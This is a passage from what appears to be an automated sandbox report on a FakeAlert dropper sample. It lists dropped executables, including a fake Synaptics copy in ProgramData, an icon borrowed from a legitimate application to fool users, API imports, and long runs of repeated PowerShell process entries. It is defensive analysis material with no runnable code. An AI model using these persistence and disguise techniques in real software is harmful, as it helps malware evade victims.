                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432518 push 00432544h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00496530 push 00496586h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048859C push 004885DEh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432650 push 004326C6h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A6BC push 0049A745h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00480744 push 00480770h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049A750 push 0049A776h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048077C push 004807A8h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048477C push 004847A8h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\RCXCD96.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\Users\user\Desktop\._cache_uniformerede.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeFile created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dllJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeFile created: C:\Users\user\AppData\Local\Temp\uniformerede.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXF979.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile created: C:\ProgramData\Synaptics\RCXCD96.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpJump to dropped file

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Icon mismatch, binary includes an icon from a different legit application in order to fool users
                                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044083C IsIconic,GetCapture,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044083C IsIconic,GetCapture,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044083C IsIconic,GetCapture,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
